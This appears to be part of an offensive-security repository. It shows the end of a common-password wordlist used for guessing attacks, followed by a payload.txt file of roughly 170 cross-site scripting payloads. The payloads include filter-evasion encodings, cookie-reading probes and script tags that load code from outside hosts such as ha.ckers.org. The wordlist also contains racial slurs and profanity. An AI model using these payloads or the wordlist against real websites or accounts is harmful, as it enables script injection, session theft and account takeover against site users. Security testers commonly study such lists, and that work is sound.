 773 | cancer
 774 | bullet
 775 | beautiful
 776 | alabama
 777 | 212121
 778 | unknown
 779 | sunflower
 780 | sports
 781 | siemens
 782 | santiago
 783 | kathleen
 784 | hotmail
 785 | hamster
 786 | golfer
 787 | future
 788 | father
 789 | enterprise
 790 | clifford
 791 | christina
 792 | camille
 793 | camaro
 794 | beauty
 795 | 55555555
 796 | vision
 797 | tornado
 798 | something
 799 | rosemary
 800 | qweasd
 801 | patches
 802 | magic
 803 | helena
 804 | denver
 805 | cracker
 806 | beaver
 807 | basket
 808 | atlanta
 809 | vacation
 810 | smiles
 811 | ricardo
 812 | pascal
 813 | newton
 814 | jeffrey
 815 | jasmin
 816 | january
 817 | honey
 818 | hollywood
 819 | holiday
 820 | gloria
 821 | element
 822 | chandler
 823 | booger
 824 | angelo
 825 | allison
 826 | action
 827 | 99999999
 828 | target
 829 | snowman
 830 | miguel
 831 | marley
 832 | lorraine
 833 | howard
 834 | harmony
 835 | children
 836 | celtic
 837 | beatrice
 838 | airborne
 839 | wicked
 840 | voyager
 841 | valentin
 842 | thx1138
 843 | thumper
 844 | samurai
 845 | moonlight
 846 | mmmmmm
 847 | karate
 848 | kamikaze
 849 | jamaica
 850 | emerald
 851 | bubble
 852 | brooke
 853 | zombie
 854 | strawberry
 855 | spooky
 856 | software
 857 | simpson
 858 | service
 859 | sarah
 860 | racing
 861 | qazxsw
 862 | philips
 863 | oscar
 864 | minnie
 865 | lalala
 866 | ironman
 867 | goddess
 868 | extreme
 869 | empire
 870 | elaine
 871 | drummer
 872 | classic
 873 | carrie
 874 | berlin
 875 | asdfg
 876 | 22222222
 877 | valerie
 878 | tintin
 879 | therock
 880 | sunday
 881 | skywalker
 882 | salvador
 883 | pegasus
 884 | panthers
 885 | packers
 886 | network
 887 | mission
 888 | mark
 889 | legolas
 890 | lacrosse
 891 | kitty
 892 | kelly
 893 | jester
 894 | italia
 895 | hiphop
 896 | freeman
 897 | charlie1
 898 | cardinal
 899 | bluemoon
 900 | bbbbbb
 901 | bastard
 902 | alyssa
 903 | 0123456789
 904 | zeppelin
 905 | tinker
 906 | surfer
 907 | smile
 908 | rockstar
 909 | operator
 910 | naruto
 911 | freddie
 912 | dragonfly
 913 | dickhead
 914 | connor
 915 | anaconda
 916 | amsterdam
 917 | alfred
 918 | a12345
 919 | 789456123
 920 | 77777777
 921 | trooper
 922 | skittles
 923 | shalom
 924 | raptor
 925 | pioneer
 926 | personal
 927 | ncc1701
 928 | nascar
 929 | music
 930 | kristen
 931 | kingkong
 932 | global
 933 | geronimo
 934 | germany
 935 | country
 936 | christmas
 937 | bernard
 938 | benson
 939 | wrestling
 940 | warren
 941 | techno
 942 | sunrise
 943 | stefan
 944 | sister
 945 | savage
 946 | russell
 947 | robinson
 948 | oracle
 949 | millie
 950 | maddog
 951 | lightning
 952 | kingston
 953 | kennedy
 954 | hannibal
 955 | garcia
 956 | download
 957 | dollar
 958 | darkstar
 959 | brutus
 960 | bobby
 961 | autumn
 962 | webster
 963 | vanilla
 964 | undertaker
 965 | tinkerbell
 966 | sweetpea
 967 | ssssss
 968 | softball
 969 | rafael
 970 | panasonic
 971 | pa55word
 972 | keyboard
 973 | isabel
 974 | hector
 975 | fisher
 976 | dominic
 977 | darkside
 978 | cleopatra
 979 | blue
 980 | assassin
 981 | amelia
 982 | vladimir
 983 | roland
 984 | nigger
 985 | national
 986 | monique
 987 | molly
 988 | matthew1
 989 | godfather
 990 | frank
 991 | curtis
 992 | change
 993 | central
 994 | cartman
 995 | brothers
 996 | boogie
 997 | archie
 998 | warriors
 999 | universe
1000 | turkey
1001 | topgun
1002 | solomon
1003 | sherry
1004 | sakura
1005 | rush2112
1006 | qwaszx
1007 | office
1008 | mushroom
1009 | monika
1010 | marion
1011 | lorenzo
1012 | john
1013 | herman
1014 | connect
1015 | chopper
1016 | burton
1017 | blondie
1018 | bitch
1019 | bigdaddy
1020 | amber
1021 | 456789
1022 | 1a2b3c4d
1023 | ultimate
1024 | tequila
1025 | tanner
1026 | sweetie
1027 | scott
1028 | rocky
1029 | popeye
1030 | peterpan
1031 | packard
1032 | loverboy
1033 | leonard
1034 | jimmy
1035 | harry
1036 | griffin
1037 | design
1038 | buddha
1039 | 1
1040 | wallace
1041 | truelove
1042 | trombone
1043 | toronto
1044 | tarzan
1045 | shirley
1046 | sammy
1047 | pebbles
1048 | natalia
1049 | marcel
1050 | malcolm
1051 | madeline
1052 | jerome
1053 | gilbert
1054 | gangster
1055 | dingdong
1056 | catalina
1057 | buddy
1058 | blazer
1059 | billy
1060 | bianca
1061 | alejandro
1062 | 54321
1063 | 252525
1064 | 111222
1065 | 0000
1066 | water
1067 | sucker
1068 | rooster
1069 | potato
1070 | norton
1071 | lucky1
1072 | loving
1073 | lol123
1074 | ladybug
1075 | kittycat
1076 | fuck
1077 | forget
1078 | flipper
1079 | fireman
1080 | digger
1081 | bonjour
1082 | baxter
1083 | audrey
1084 | aquarius
1085 | 1111111111
1086 | pppppp
1087 | planet
1088 | pencil
1089 | patriots
1090 | oxford
1091 | million
1092 | martha
1093 | lindsay
1094 | laura
1095 | jamesbond
1096 | ihateyou
1097 | goober
1098 | giants
1099 | garden
1100 | diana
1101 | cecilia
1102 | brazil
1103 | blessing
1104 | bishop
1105 | bigdog
1106 | airplane
1107 | Password1
1108 | tomtom
1109 | stingray
1110 | psycho
1111 | pickle
1112 | outlaw
1113 | number1
1114 | mylove
1115 | maurice
1116 | madman
1117 | maddie
1118 | lester
1119 | hendrix
1120 | hellfire
1121 | happy1
1122 | guardian
1123 | flamingo
1124 | enter
1125 | chichi
1126 | 0987654321
1127 | western
1128 | twister
1129 | trumpet
1130 | trixie
1131 | socrates
1132 | singer
1133 | sergio
1134 | sandman
1135 | richmond
1136 | piglet
1137 | pass123
1138 | osiris
1139 | monkey1
1140 | martina
1141 | justine
1142 | english
1143 | electric
1144 | church
1145 | castle
1146 | caesar
1147 | birdie
1148 | aurora
1149 | artist
1150 | amadeus
1151 | alberto
1152 | 246810
1153 | whitney
1154 | thankyou
1155 | sterling
1156 | star
1157 | ronnie
1158 | pussy
1159 | printer
1160 | picasso
1161 | munchkin
1162 | morpheus
1163 | madmax
1164 | kaiser
1165 | julius
1166 | imperial
1167 | happiness
1168 | goodluck
1169 | counter
1170 | columbia
1171 | campbell
1172 | blessed
1173 | blackjack
1174 | alpha
1175 | 999999999
1176 | 142536
1177 | wombat
1178 | wildcat
1179 | trevor
1180 | telephone
1181 | smiley
1182 | saints
1183 | pretty
1184 | oblivion
1185 | newcastle
1186 | mariana
1187 | janice
1188 | israel
1189 | imagine
1190 | freedom1
1191 | detroit
1192 | deedee
1193 | darren
1194 | catfish
1195 | adriana
1196 | washington
1197 | warlock
1198 | valentina
1199 | valencia
1200 | thebest
1201 | spectrum
1202 | skater
1203 | sheila
1204 | shaggy
1205 | poiuyt
1206 | member
1207 | jessica1
1208 | jeremiah
1209 | jack
1210 | insane
1211 | iloveu
1212 | handsome
1213 | goldberg
1214 | gabriela
1215 | elijah
1216 | damien
1217 | daisy
1218 | buttons
1219 | blabla
1220 | bigboy
1221 | apache
1222 | anthony1
1223 | a1234567
1224 | xxxxxxxx
1225 | toshiba
1226 | tommy
1227 | sailor
1228 | peekaboo
1229 | motherfucker
1230 | montreal
1231 | manuel
1232 | madrid
1233 | kramer
1234 | katherine
1235 | kangaroo
1236 | jenny
1237 | immortal
1238 | harris
1239 | hamlet
1240 | gracie
1241 | fucking
1242 | firefly
1243 | chocolat
1244 | bentley
1245 | account
1246 | 321321
1247 | 2222
1248 | 1a2b3c
1249 | thompson
1250 | theman
1251 | strike
1252 | stacey
1253 | science
1254 | running
1255 | research
1256 | polaris
1257 | oklahoma
1258 | mariposa
1259 | marie
1260 | leader
1261 | julia
1262 | island
1263 | idontknow
1264 | hitman
1265 | german
1266 | felipe
1267 | fatcat
1268 | fatboy
1269 | defender
1270 | applepie
1271 | annette
1272 | 010203
1273 | watson
1274 | travel
1275 | sublime
1276 | stewart
1277 | steve
1278 | squirrel
1279 | simon
1280 | sexy
1281 | pineapple
1282 | phoebe
1283 | paris
1284 | panzer
1285 | nadine
1286 | master1
1287 | mario
1288 | kelsey
1289 | joker
1290 | hongkong
1291 | gorilla
1292 | dinosaur
1293 | connie
1294 | bowling
1295 | bambam
1296 | babydoll
1297 | aragorn
1298 | andreas
1299 | 456123
1300 | 151515
1301 | wolves
1302 | wolfgang
1303 | turner
1304 | semperfi
1305 | reaper
1306 | patience
1307 | marilyn
1308 | fletcher
1309 | drpepper
1310 | dorothy
1311 | creation
1312 | brian
1313 | bluesky
1314 | andre
1315 | yankee
1316 | wordpass
1317 | sweet
1318 | spunky
1319 | sidney
1320 | serena
1321 | preston
1322 | pauline
1323 | passwort
1324 | original
1325 | nightmare
1326 | miriam
1327 | martinez
1328 | labrador
1329 | kristin
1330 | kissme
1331 | henry
1332 | gerald
1333 | garrett
1334 | flash
1335 | excalibur
1336 | discovery
1337 | dddddd
1338 | danny
1339 | collins
1340 | casino
1341 | broncos
1342 | brendan
1343 | brasil
1344 | apple123
1345 | yvonne
1346 | wonder
1347 | window
1348 | tomato
1349 | sundance
1350 | sasha
1351 | reggie
1352 | redwings
1353 | poison
1354 | mypassword
1355 | monopoly
1356 | mariah
1357 | margarita
1358 | lionking
1359 | king
1360 | football1
1361 | director
1362 | darling
1363 | bubba
1364 | biscuit
1365 | 44444444
1366 | wisdom
1367 | vivian
1368 | virgin
1369 | sylvester
1370 | street
1371 | stones
1372 | sprite
1373 | spike
1374 | single
1375 | sherlock
1376 | sandy
1377 | rocker
1378 | robin
1379 | matt
1380 | marianne
1381 | linda
1382 | lancelot
1383 | jeanette
1384 | hobbes
1385 | fred
1386 | ferret
1387 | dodger
1388 | cotton
1389 | corona
1390 | clayton
1391 | celine
1392 | cannabis
1393 | bella
1394 | andromeda
1395 | 7654321
1396 | 4444
1397 | werewolf
1398 | starcraft
1399 | sampson
1400 | redrum
1401 | pyramid
1402 | prodigy
1403 | paul
1404 | michel
1405 | martini
1406 | marathon
1407 | longhorn
1408 | leopard
1409 | judith
1410 | joanne
1411 | jesus1
1412 | inferno
1413 | holly
1414 | harold
1415 | happy123
1416 | esther
1417 | dudley
1418 | dragon1
1419 | darwin
1420 | clinton
1421 | celeste
1422 | catdog
1423 | brucelee
1424 | argentina
1425 | alpine
1426 | 147852369
1427 | wrangler
1428 | william1
1429 | vikings
1430 | trigger
1431 | stranger
1432 | silvia
1433 | shotgun
1434 | scarlett
1435 | scarlet
1436 | redhead
1437 | raider
1438 | qweasdzxc
1439 | playstation
1440 | mystery
1441 | morrison
1442 | honda
1443 | february
1444 | fantasia
1445 | designer
1446 | coyote
1447 | cool
1448 | bulldogs
1449 | bernie
1450 | baby
1451 | asdfghj
1452 | angel1
1453 | always
1454 | adam
1455 | 202020
1456 | wanker
1457 | sullivan
1458 | stealth
1459 | skeeter
1460 | saturday
1461 | rodney
1462 | prelude
1463 | pingpong
1464 | phillip
1465 | peewee
1466 | peanuts
1467 | peace
1468 | nugget
1469 | newport
1470 | myself
1471 | mouse
1472 | memphis
1473 | lover
1474 | lancer
1475 | kristine
1476 | james1
1477 | hobbit
1478 | halloween
1479 | fuckyou1
1480 | finger
1481 | fearless
1482 | dodgers
1483 | delete
1484 | cougar
1485 | charmed
1486 | cassandra
1487 | caitlin
1488 | bismillah
1489 | believe
1490 | alice
1491 | airforce
1492 | 7777
1493 | viper
1494 | tony
1495 | theodore
1496 | sylvia
1497 | suzanne
1498 | starfish
1499 | sparkle
1500 | server
1501 | samsam
1502 | qweqwe
1503 | public
1504 | pass1234
1505 | neptune
1506 | marian
1507 | krishna
1508 | kkkkkk
1509 | jungle
1510 | cinnamon
1511 | bitches
1512 | 741852
1513 | trojan
1514 | theresa
1515 | sweetheart
1516 | speaker
1517 | salmon
1518 | powers
1519 | pizza
1520 | overlord
1521 | michaela
1522 | meredith
1523 | masters
1524 | lindsey
1525 | history
1526 | farmer
1527 | express
1528 | escape
1529 | cuddles
1530 | carson
1531 | candy
1532 | buttercup
1533 | brownie
1534 | broken
1535 | abc12345
1536 | aardvark
1537 | Passw0rd
1538 | 141414
1539 | 124578
1540 | 123789
1541 | 12345678910
1542 | 00000
1543 | universal
1544 | trinidad
1545 | tobias
1546 | thursday
1547 | surfing
1548 | stuart
1549 | stinky
1550 | standard
1551 | roller
1552 | porter
1553 | pearljam
1554 | mobile
1555 | mirage
1556 | markus
1557 | loulou
1558 | jjjjjj
1559 | herbert
1560 | grace
1561 | goldie
1562 | frosty
1563 | fighter
1564 | fatima
1565 | evelyn
1566 | eagle
1567 | desire
1568 | crimson
1569 | coconut
1570 | cheryl
1571 | beavis
1572 | anonymous
1573 | andres
1574 | africa
1575 | 134679
1576 | 
1577 | 


--------------------------------------------------------------------------------
/payload.txt:
--------------------------------------------------------------------------------
  1 | <script>alert(123);</script>
  2 | <ScRipT>alert("XSS");</ScRipT>
  3 | <script>alert(123)</script>
  4 | <script>alert("hellox worldss");</script>
  5 | <script>alert(“XSS”)</script> 
  6 | <script>alert(“XSS”);</script>
  7 | <script>alert(‘XSS’)</script>
  8 | “><script>alert(“XSS”)</script>
  9 | <script>alert(/XSS”)</script>
 10 | <script>alert(/XSS/)</script>
 11 | </script><script>alert(1)</script>
 12 | ‘; alert(1);
 13 | ‘)alert(1);//
 14 | <ScRiPt>alert(1)</sCriPt>
 15 | <IMG SRC=jAVasCrIPt:alert(‘XSS’)>
 16 | <IMG SRC=”javascript:alert(‘XSS’);”>
 17 | <IMG SRC=javascript:alert(&quot;XSS&quot;)>
 18 | <IMG SRC=javascript:alert(‘XSS’)>      
 19 | <img src=xss onerror=alert(1)>
 20 | <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
 21 | <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
 22 | <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
 23 | <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
 24 | <img/src=`%00` onerror=this.onerror=confirm(1)
 25 | <form><isindex formaction="javascript&colon;confirm(1)"
 26 | <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
 27 | <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
 28 | <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
 29 | <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
 30 | <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
 31 | &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
 32 | <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
 33 | <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
 34 | <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
 35 | <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
 36 | <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
 37 | <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
 38 | <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
 39 | </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
 40 | <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
 41 | <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
 42 | <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
 43 | http://www.google<script .com>alert(document.location)</script
 44 | <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
 45 | <img/src=@&#32;&#13; onerror = prompt('&#49;')
 46 | <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
 47 | <script ^__^>alert(String.fromCharCode(49))</script ^__^
 48 | </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
 49 | &#00;</form><input type&#61;"date" onfocus="alert(1)">
 50 | <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
 51 | <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
 52 | <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
 53 | <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
 54 | <script ~~~>alert(0%0)</script ~~~>
 55 | <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
 56 | <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
 57 | <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
 58 | &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
 59 | &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
 60 | <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
 61 | <div/style="width:expression(confirm(1))">X</div> {IE7}
 62 | <iframe/%00/ src=javaSCRIPT&colon;alert(1)
 63 | //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
 64 | /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
 65 | //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
 66 | </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
 67 | <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
 68 | </plaintext\></|\><plaintext/onmouseover=prompt(1)
 69 | </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
 70 | <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
 71 | <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
 72 | <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
 73 | <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
 74 | <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
 75 | <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
 76 | <var onmouseover="prompt(1)">On Mouse Over</var>
 77 | <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
 78 | <img src="/" =_=" title="onerror='prompt(1)'">
 79 | <%<!--'%><script>alert(1);</script -->
 80 | <script src="data:text/javascript,alert(1)"></script>
 81 | <iframe/src \/\/onload = prompt(1)
 82 | <iframe/onreadystatechange=alert(1)
 83 | <svg/onload=alert(1)
 84 | <input value=<><iframe/src=javascript:confirm(1)
 85 | <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
 86 | http://www.<script>alert(1)</script .com
 87 | <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
 88 | <svg><script ?>alert(1)
 89 | <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
 90 | <img src=`xx:xx`onerror=alert(1)>
 91 | <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
 92 | <math><a xlink:href="//jsfiddle.net/t846h/">click
 93 | <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
 94 | <svg contentScriptType=text/vbs><script>MsgBox+1
 95 | <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
 96 | <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
 97 | <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
 98 | <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
 99 | <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
100 | <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
101 | <script>+-+-1-+-+alert(1)</script>
102 | <body/onload=&lt;!--&gt;&#10alert(1)>
103 | <script itworksinallbrowsers>/*<script* */alert(1)</script
104 | <img src ?itworksonchrome?\/onerror = alert(1)
105 | <svg><script>//&NewLine;confirm(1);</script </svg>
106 | <svg><script onlypossibleinopera:-)> alert(1)
107 | <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
108 | <script x> alert(1) </script 1=2
109 | <div/onmouseover='alert(1)'> style="x:">
110 | <--`<img/src=` onerror=alert(1)> --!>
111 |  <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
112 | <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
113 | "><img src=x onerror=window.open('https://www.google.com/');>
114 | <form><button formaction=javascript&colon;alert(1)>CLICKME
115 | <math><a xlink:href="//jsfiddle.net/t846h/">click
116 | <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
117 | <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
118 | <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
119 | <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
120 | ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
121 | <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
122 | <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
123 | <IMG SRC=”jav ascript:alert(‘XSS’);”>
124 | <IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>
125 | <<SCRIPT>alert(“XSS”);//<</SCRIPT>
126 | %253cscript%253ealert(1)%253c/script%253e
127 | “><s”%2b”cript>alert(document.cookie)</script>
128 | foo<script>alert(1)</script>
129 | <scr<script>ipt>alert(1)</scr</script>ipt>
130 | <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
131 | <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
132 | <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
133 | <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
134 | <BODY ONLOAD=alert(‘XSS’)>
135 | <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
136 | <IMG SRC=”javascript:alert(‘XSS’)”
137 | <iframe src=http://ha.ckers.org/scriptlet.html <
138 | javascript:alert("hellox worldss")
139 | <img src="javascript:alert('XSS');">
140 | <img src=javascript:alert(&quot;XSS&quot;)>
141 | <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
142 | <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
143 | <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
144 | <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
145 | <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
146 | <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
147 | <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
148 | <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
149 | <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
150 | <<SCRIPT>alert("XSS");//<</SCRIPT>
151 | <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
152 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
153 | <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
154 | <script>alert("XSS");</script>&search=1
155 | 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
156 | <h1><font color=blue>hellox worldss</h1>
157 | <BODY ONLOAD=alert('hellox worldss')>
158 | <input onfocus=write(XSS) autofocus>
159 | <input onblur=write(XSS) autofocus><input autofocus>
160 | <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
161 | <form><button formaction="javascript:alert(XSS)">lol
162 | <!--<img src="--><img src=x onerror=alert(XSS)//">
163 | <![><img src="]><img src=x onerror=alert(XSS)//">
164 | <style><img src="</style><img src=x onerror=alert(XSS)//">
165 | <? foo="><script>alert(1)</script>">
166 | <! foo="><script>alert(1)</script>">
167 | </ foo="><script>alert(1)</script>">
168 | <? foo="><x foo='?><script>alert(1)</script>'>">
169 | <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
170 | <% foo><x foo="%><script>alert(123)</script>">
171 | <div style="font-family:'foo&#10;;color:red;';">LOL
